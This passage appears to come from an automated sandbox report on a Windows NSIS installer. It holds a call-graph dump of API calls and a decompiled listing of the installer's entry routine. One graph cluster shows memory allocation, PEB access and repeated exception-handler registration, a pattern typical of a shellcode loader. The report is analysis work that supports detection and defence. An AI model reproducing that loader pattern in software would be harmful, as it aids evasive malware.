7698->7699 7700 7328245e GlobalAlloc 7699->7700 7701 73281868 7699->7701 7700->7699 7701->7610 7706 73282840 7702->7706 7703 732828db GlobalAlloc 7707 732828fe 7703->7707 7704 732828ee 7705 732828f4 GlobalSize 7704->7705 7704->7707 7705->7707 7706->7703 7706->7704 7707->7637 7709 73282e2e 7708->7709 7710 73282e6e GlobalFree 7709->7710 7765 732812bb GlobalAlloc 7711->7765 7713 732826d8 MultiByteToWideChar 7720 7328265f 7713->7720 7714 732826fa StringFromGUID2 7714->7720 7715 7328270b lstrcpynW 7715->7720 7716 7328271e wsprintfW 7716->7720 7717 73282742 GlobalFree 7717->7720 7718 73282777 GlobalFree 7718->7625 7719 73281312 2 API calls 7719->7720 7720->7713 7720->7714 7720->7715 7720->7716 7720->7717 7720->7718 7720->7719 7766 73281381 7720->7766 7770 732812bb GlobalAlloc 7722->7770 7724 73281659 7725 73281666 2 API calls 7724->7725 7726 73281663 7725->7726 7727 73281312 7726->7727 7728 7328131b GlobalAlloc lstrcpynW 7727->7728 7729 73281355 GlobalFree 7727->7729 7728->7729 7729->7631 7731 7328169f lstrcpyW 7730->7731 7732 73281672 wsprintfW 7730->7732 7735 732816b8 7731->7735 7732->7735 7735->7635 7737 73281931 7736->7737 7738 73282626 7736->7738 7737->7644 7737->7645 7738->7737 7739 73282642 GlobalFree 7738->7739 7739->7738 7741 73281312 2 API calls 7740->7741 7742 732815fe 7741->7742 7742->7638 7743->7650 7744->7654 7746 7328164d 7745->7746 7746->7674 7753 732812bb GlobalAlloc 7747->7753 7749 732812db lstrcpynW 7749->7667 7750->7681 7751->7677 7752->7675 7753->7749 7755 73281361 7754->7755 7756 732812cc 2 API calls 7755->7756 7757 7328137f 7756->7757 7757->7689 7759 73282808 7758->7759 7760 732827b2 VirtualAlloc 7758->7760 7759->7691 7760->7759 7762 73282b4d 7761->7762 7763 73282b5d 7762->7763 7764 73282b52 GetLastError 7762->7764 7763->7696 7764->7763 7765->7720 7767 7328138a 7766->7767 7768 732813ac 7766->7768 7767->7768 7769 73281390 lstrcpyW 7767->7769 7768->7720 7769->7768 7770->7724 7873 401ede 7881 402d84 7873->7881 7875 401ee4 7876 402d84 17 API calls 7875->7876 7877 401ef0 7876->7877 7878 401f07 EnableWindow 7877->7878 7879 401efc ShowWindow 7877->7879 7880 402c2a 7878->7880 7879->7880 7882 40657a 17 API calls 7881->7882 7883 402d99 7882->7883 7883->7875 7884 4056de 7885 405888 7884->7885 7886 4056ff GetDlgItem GetDlgItem GetDlgItem 7884->7886 7888 405891 GetDlgItem CreateThread CloseHandle 7885->7888 7889 4058b9 7885->7889 7930 4044ce SendMessageW 7886->7930 7888->7889 7933 405672 5 API calls 7888->7933 7891 4058e4 7889->7891 7892 4058d0 ShowWindow ShowWindow 7889->7892 7893 405909 7889->7893 7890 40576f 7896 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 7890->7896 7894 4058f0 7891->7894 7895 405944 7891->7895 7932 4044ce SendMessageW 7892->7932 7900 404500 8 API calls 7893->7900 7898 4058f8 7894->7898 7899 40591e ShowWindow 7894->7899 7895->7893 7906 405952 SendMessageW 7895->7906 7904 4057e4 7896->7904 7905 4057c8 SendMessageW SendMessageW 7896->7905 7907 404472 SendMessageW 7898->7907 7902 405930 7899->7902 7903 40593e 7899->7903 7901 405917 7900->7901 7908 40559f 24 API calls 7902->7908 7909 404472 SendMessageW 7903->7909 7910 4057f7 7904->7910 7911 4057e9 SendMessageW 7904->7911 7905->7904 7906->7901 7912 40596b CreatePopupMenu 7906->7912 7907->7893 7908->7903 7909->7895 7914 404499 18 API calls 7910->7914 7911->7910 7913 40657a 17 API calls 7912->7913 7915 40597b AppendMenuW 7913->7915 7916 405807 7914->7916 7917 405998 GetWindowRect 7915->7917 7918 4059ab TrackPopupMenu 7915->7918 7919 405810 ShowWindow 7916->7919 7920 405844 GetDlgItem SendMessageW 7916->7920 7917->7918 7918->7901 7922 4059c6 7918->7922 7923 405833 7919->7923 7924 405826 ShowWindow 7919->7924 7920->7901 7921 40586b SendMessageW SendMessageW 7920->7921 7921->7901 7925 4059e2 SendMessageW 7922->7925 7931 4044ce SendMessageW 7923->7931 7924->7923 7925->7925 7926 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 7925->7926 7928 405a24 SendMessageW 7926->7928 7928->7928 7929 405a4d GlobalUnlock SetClipboardData CloseClipboard 7928->7929 7929->7901 7930->7890 7931->7920 7932->7891 7934 36f57f0 7935 36f585c NtAllocateVirtualMemory 7934->7935 7940 36f6bbc 7934->7940 7937 36f595d 7935->7937 7948 36f599f 7937->7948 7939 36f5a30 7941 36f6c1b 7940->7941 7947 36f6c2f 7940->7947 7979 36f6eaf GetPEB 7941->7979 7943 36f6c25 8009 36f6c40 7943->8009 7944 36f6c40 3 API calls 7946 36f6c3c 7944->7946 7946->7935 7947->7944 7949 36f5241 7948->7949 7957 36f0899 7948->7957 7949->7939 7950 36f773f 3 API calls 7950->7957 7951 36f6c2f 7955 36f6c40 3 API calls 7951->7955 7952 36f6eaf 3 API calls 7954 36f6c25 7952->7954 7953 36f0855 7953->7939 7956 36f6c40 3 API calls 7954->7956 7958 36f6c3c 7955->7958 7956->7951 7957->7950 7957->7953 7959 36f4d92 7957->7959 7967 36f4e1a 7957->7967 7968 36f834f RtlAddVectoredExceptionHandler 7957->7968 7969 36f4c72 7957->7969 7958->7939 7960 36f834f RtlAddVectoredExceptionHandler 7959->7960 7961 36f4da3 7960->7961 7962 36f834f RtlAddVectoredExceptionHandler 7961->7962 7963 36f4db1 7962->7963 7964 36f834f RtlAddVectoredExceptionHandler 7963->7964 7965 36f4de7 7964->7965 7966 36f834f RtlAddVectoredExceptionHandler 7965->7966 7966->7967 7967->7939 7967->7951 7967->7952 7968->7957 7970 36f834f RtlAddVectoredExceptionHandler 7969->7970 7971 36f4c83 7970->7971 7971->7959 7972 36f834f RtlAddVectoredExceptionHandler 7971->7972 7973 36f4cfc 7972->7973 7973->7959 7974 36f4d28 7973->7974 7975 36f834f RtlAddVectoredExceptionHandler 7974->7975 7976 36f4d53 7975->7976 7977 36f834f RtlAddVectoredExceptionHandler 7976->7977 7978 36f4d8f 7977->7978 7978->7939 7997 36f0899 7979->7997 7981 36f4e1a 7981->7943 7982 36f6c2f 7981->7982 7983 36f6eaf 2 API calls 7981->7983 7986 36f6c40 2 API calls 7982->7986 7984 36f6c25 7983->7984 7987 36f6c40 2 API calls 7984->7987 7985 36f0855 7985->7943 7988 36f6c3c 7986->7988 7987->7982 7988->7943 7989 36f4d92 7990 36f834f RtlAddVectoredExceptionHandler 7989->7990 7991 36f4da3 7990->7991 7992 36f834f RtlAddVectoredExceptionHandler 7991->7992 7993 36f4db1 7992->7993 7994 36f834f RtlAddVectoredExceptionHandler 7993->7994 7995 36f4de7 7994->7995 7996 36f834f RtlAddVectoredExceptionHandler 7995->7996 7996->7981 7997->7981 7997->7985 7997->7989 7998 36f834f RtlAddVectoredExceptionHandler 7997->7998 7999 36f4c72 7997->7999 8013 36f773f 7997->8013 7998->7997 8048 36f834f 7999->8048 8010 36f6c76 8009->8010 8012 36f6ce4 8010->8012 8050 36f6d13 8010->8050 8012->7947 8014 36f775f 8013->8014 8021 36f0855 8013->8021 8015 36f6bbc 2 API calls 8014->8015 8016 36f7765 8015->8016 8017 36f6bbc 2 API calls 8016->8017 8018 36f7778 GetPEB 8017->8018 8020 36f0899 8018->8020 8019 36f773f 2 API calls 8019->8020 8020->8019 8020->8021 8028 36f4d92 8020->8028 8036 36f4e1a 8020->8036 8037 36f834f RtlAddVectoredExceptionHandler 8020->8037 8038 36f4c72 8020->8038 8021->7997 8022 36f6eaf 2 API calls 8023 36f6c25 8022->8023 8025 36f6c40 2 API calls 8023->8025 8024 36f6c40 2 API calls 8026 36f6c3c 8024->8026 8027 36f6c2f 8025->8027 8026->7997 8027->8024 8029 36f834f RtlAddVectoredExceptionHandler 8028->8029 8030 36f4da3 8029->8030 8031 36f834f RtlAddVectoredExceptionHandler 8030->8031 8032 36f4db1 8031->8032 8033 36f834f RtlAddVectoredExceptionHandler 8032->8033 8034 36f4de7 8033->8034 8035 36f834f RtlAddVectoredExceptionHandler 8034->8035 8035->8036 8036->7997 8036->8022 8036->8027 8037->8020 8039 36f834f RtlAddVectoredExceptionHandler 8038->8039 8040 36f4c83 8039->8040 8040->8028 8041 36f834f RtlAddVectoredExceptionHandler 8040->8041 8042 36f4cfc 8041->8042 8042->8028 8043 36f4d28 8042->8043 8044 36f834f RtlAddVectoredExceptionHandler 8043->8044 8045 36f4d53 8044->8045 8046 36f834f RtlAddVectoredExceptionHandler 8045->8046 8047 36f4d8f 8046->8047 8047->7997 8049 36f8354 RtlAddVectoredExceptionHandler 8048->8049 8051 36f6d29 8050->8051 8059 36f0899 8050->8059 8051->8010 8052 36f773f 3 API calls 8052->8059 8053 36f6c2f 8057 36f6c40 3 API calls 8053->8057 8054 36f6eaf 3 API calls 8056 36f6c25 8054->8056 8055 36f0855 8055->8010 8058 36f6c40 3 API calls 8056->8058 8060 36f6c3c 8057->8060 8058->8053 8059->8052 8059->8055 8061 36f4d92 8059->8061 8069 36f4e1a 8059->8069 8070 36f834f RtlAddVectoredExceptionHandler 8059->8070 8071 36f4c72 8059->8071 8060->8010 8062 36f834f RtlAddVectoredExceptionHandler 8061->8062 8063 36f4da3 8062->8063 8064 36f834f RtlAddVectoredExceptionHandler 8063->8064 8065 36f4db1 8064->8065 8066 36f834f RtlAddVectoredExceptionHandler 8065->8066 8067 36f4de7 8066->8067 8068 36f834f RtlAddVectoredExceptionHandler 8067->8068 8068->8069 8069->8010 8069->8053 8069->8054 8070->8059 8072 36f834f RtlAddVectoredExceptionHandler 8071->8072 8073 36f4c83 8072->8073 8073->8061 8074 36f834f RtlAddVectoredExceptionHandler 8073->8074 8075 36f4cfc 8074->8075 8075->8061 8076 36f4d28 8075->8076 8077 36f834f RtlAddVectoredExceptionHandler 8076->8077 8078 36f4d53 8077->8078 8079 36f834f RtlAddVectoredExceptionHandler 8078->8079 8080 36f4d8f 8079->8080 8080->8010 9331 401ff6 9332 402da6 17 API calls 9331->9332 9333 401ffd 9332->9333 9334 406873 2 API calls 9333->9334 9335 402003 9334->9335 9337 402014 9335->9337 9338 406484 wsprintfW 9335->9338 9338->9337 7771 403f9a 7772 403fb2 7771->7772 7773 404113 7771->7773 7772->7773 7774 403fbe 7772->7774 7775 404164 7773->7775 7776 404124 GetDlgItem GetDlgItem 7773->7776 7777 403fc9 SetWindowPos 7774->7777 7778 403fdc 7774->7778 7780 4041be 7775->7780 7791 401389 2 API calls 7775->7791 7779 404499 18 API calls 7776->7779 7777->7778 7782 403fe5 ShowWindow 7778->7782 7783 404027 7778->7783 7784 40414e SetClassLongW 7779->7784 7781 4044e5 SendMessageW 7780->7781 7785 40410e 7780->7785 7814 4041d0 7781->7814 7786 404100 7782->7786 7787 404005 GetWindowLongW 7782->7787 7788 404046 7783->7788 7789 40402f DestroyWindow 7783->7789 7790 40140b 2 API calls 7784->7790 7853 404500 7786->7853 7787->7786 7793 40401e ShowWindow 7787->7793 7795 40404b SetWindowLongW 7788->7795 7796 40405c 7788->7796 7794 404422 7789->7794 7790->7775 7797 404196 7791->7797 7793->7783 7794->7785 7802 404453 ShowWindow 7794->7802 7795->7785 7796->7786 7801 404068 GetDlgItem 7796->7801 7797->7780 7798 40419a SendMessageW 7797->7798 7798->7785 7799 40140b 2 API calls 7799->7814 7800 404424 DestroyWindow EndDialog 7800->7794 7803 404096 7801->7803 7804 404079 SendMessageW IsWindowEnabled 7801->7804 7802->7785 7806 4040a3 7803->7806 7807 4040ea SendMessageW 7803->7807 7808 4040b6 7803->7808 7817 40409b 7803->7817 7804->7785 7804->7803 7805 40657a 17 API calls 7805->7814 7806->7807 7806->7817 7807->7786 7811 4040d3 7808->7811 7812 4040be 7808->7812 7810 404499 18 API calls 7810->7814 7816 40140b 2 API calls 7811->7816 7815 40140b 2 API calls 7812->7815 7813 4040d1 7813->7786 7814->7785 7814->7799 7814->7800 7814->7805 7814->7810 7835 404364 DestroyWindow 7814->7835 7844 404499 7814->7844 7815->7817 7818 4040da 7816->7818 7850 404472 7817->7850 7818->7786 7818->7817 7820 40424b GetDlgItem 7821 404260 7820->7821 7822 404268 ShowWindow KiUserCallbackDispatcher 7820->7822 7821->7822 7847 4044bb KiUserCallbackDispatcher 7822->7847 7824 404292 EnableWindow 7829 4042a6 7824->7829 7825 4042ab GetSystemMenu EnableMenuItem SendMessageW 7826 4042db SendMessageW 7825->7826 7825->7829 7826->7829 7828 403f7b 18 API calls 7828->7829 7829->7825 7829->7828 7848 4044ce SendMessageW 7829->7848 7849 40653d lstrcpynW 7829->7849 7831 40430a lstrlenW 7832 40657a 17 API calls 7831->7832 7833 404320 SetWindowTextW 7832->7833 7834 401389 2 API calls 7833->7834 7834->7814 7835->7794 7836 40437e CreateDialogParamW 7835->7836 7836->7794 7837 4043b1 7836->7837 7838 404499 18 API calls 7837->7838 7839 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 7838->7839 7840 401389 2 API calls 7839->7840 7841 404402 7840->7841 7841->7785 7842 40440a ShowWindow 7841->7842 7843 4044e5 SendMessageW 7842->7843 7843->7794 7845 40657a 17 API calls 7844->7845 7846 4044a4 SetDlgItemTextW 7845->7846 7846->7820 7847->7824 7848->7829 7849->7831 7851 404479 7850->7851 7852 40447f SendMessageW 7850->7852 7851->7852 7852->7813 7854 404518 GetWindowLongW 7853->7854 7855 4045c3 7853->7855 7854->7855 7856 40452d 7854->7856 7855->7785 7856->7855 7857 40455a GetSysColor 7856->7857 7858 40455d 7856->7858 7857->7858 7859 404563 SetTextColor 7858->7859 7860 40456d SetBkMode 7858->7860 7859->7860 7861 404585 GetSysColor 7860->7861 7862 40458b 7860->7862 7861->7862 7863 404592 SetBkColor 7862->7863 7864 40459c 7862->7864 7863->7864 7864->7855 7865 4045b6 CreateBrushIndirect 7864->7865 7866 4045af DeleteObject 7864->7866 7865->7855 7866->7865

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 46 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->46 47 40386a-403882 DeleteFileW call 40307d 35->47 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 41 4037c6-4037d4 call 405e39 39->41 42 40370c-403712 39->42 40->39 41->32 57 4037d6-4037d7 41->57 44 403714-40371b 42->44 45 40372c-403765 42->45 49 403722 44->49 50 40371d-403720 44->50 51 403781-4037bb 45->51 52 403767-40376c 45->52 46->47 66 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 46->66 62 403888-40388e 47->62 63 403a59-403a67 call 403b12 OleUninitialize 47->63 49->45 50->45 50->49 60 4037c3-4037c5 51->60 61 4037bd-4037c1 51->61 52->51 58 40376e-403776 52->58 57->32 64 403778-40377b 58->64 65 40377d 58->65 60->41 61->60 67 4037e6-4037f3 call 40653d 61->67 68 403894-4038a7 call 405e39 62->68 69 403935-40393c call 403bec 62->69 79 403a69-403a78 call 405b9d ExitProcess 63->79 80 403a7e-403a84 63->80 64->51 64->65 65->51 66->47 66->63 67->35 81 4038f9-403906 68->81 82 4038a9-4038de 68->82 78 403941-403944 69->78 78->63 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 95 4038e6-4038eb 86->95 96 4038ed-4038f5 86->96 87->88 89->63 107 40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 95->96 100 4038f7 95->100 96->86 96->100 100->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->69 108->85 109->63 115 403996 call 405aeb 110->115 116 40398f-403994 call 405a6e 110->116 120 40399b-4039ab SetCurrentDirectoryW 115->120 116->120 123 4039b8-4039e4 call 40653d 120->123 124 4039ad-4039b3 call 40653d 120->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				intOrPtr* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				void* _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                
                                                				0x440000 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x434fb8 = _v324.dwBuildNumber;
                                                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x434fbe != 0x600) {
                                                					_t180 = E0040690A(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E0040689A(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E0040690A(0xb);
                                                				 *0x434f04 = E0040690A(9);
                                                				_t88 = E0040690A(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x434fc0 = _t88;
                                                				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E0040653D(0x433f00, L"NSIS Error");
                                                				E0040653D(0x440000, GetCommandLineW());
                                                				_t94 = 0x440000;
                                                				_t234 = 0x22;
                                                				 *0x434f00 = 0x400000;
                                                				if( *0x440000 == _t234) {
                                                					_t94 = 0x440002;
                                                				}
                                                				_t199 = CharNextW(E00405E39(_t94, 0x440000));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E39(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E0040653D(0x440800, _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235);
                                                										_t116 = E004034FC(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403B12();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x434f94 == _t189) {
                                                														L77:
                                                														_t120 =  *0x434fac;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E0040690A(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B9D(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x434f1c == _t189) {
                                                												L51:
                                                												 *0x434fac =  *0x434fac | 0xffffffff;
                                                												_v24 = E00403BEC(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E39(0x440000, _t189);
                                                											if(_t219 < 0x440000) {
                                                												L48:
                                                												_t264 = _t219 - 0x440000;
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < 0x440000) {
                                                													_t190 = E00405B08(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t138 = lstrcmpiW(_t235, 0x441800);
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AEB();
                                                														} else {
                                                															E00405A6E();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags =  *0x440800;
                                                														if( *0x440800 == 0) {
                                                															E0040653D(0x440800, 0x441800);
                                                														}
                                                														E0040653D(0x436000, _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														 *0x436800 = _t144;
                                                														do {
                                                															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                															DeleteFileW(0x42aa28);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(0x443800, 0x42aa28, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062FD(_t202, 0x42aa28, 0);
                                                																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                																	_t153 = E00405B20(0x42aa28);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															 *0x436800 =  *0x436800 + 1;
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062FD(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E0040653D(0x440800, _t222);
                                                												E0040653D(0x441000, _t222);
                                                												_v8 = _t189;
                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= 0x440000) {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034FC(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034FC(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x434fa0 = 1;
                                                								goto L24;
                                                							}
